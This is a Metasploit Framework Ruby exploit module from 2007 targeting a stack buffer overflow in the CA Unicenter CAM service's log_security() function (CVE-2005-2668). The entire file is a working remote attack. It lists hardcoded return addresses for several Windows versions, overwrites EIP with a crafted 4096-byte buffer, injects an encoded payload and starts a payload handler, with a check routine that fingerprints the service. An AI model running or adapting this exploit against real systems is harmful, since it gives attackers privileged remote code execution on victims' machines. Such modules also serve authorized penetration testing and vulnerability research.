##
# $Id: cam_log_security.rb 4498 2007-03-01 08:21:36Z mmiller $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Unicenter::CAM_LOG_SECURITY < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA CAM log_security() Stack Overflow (Win32)',
			'Description'    => %q{
				This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					['BID', '14622'],
					['CVE', '2005-2668'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
	  				# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => '',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect
		
		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe	
	end
	
	def exploit
		connect
	
		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end
		
		buf = rand_text_english(4096, payload_badchars)
		
		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded 

		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")
		
		handler
		disconnect
	end

end
end	
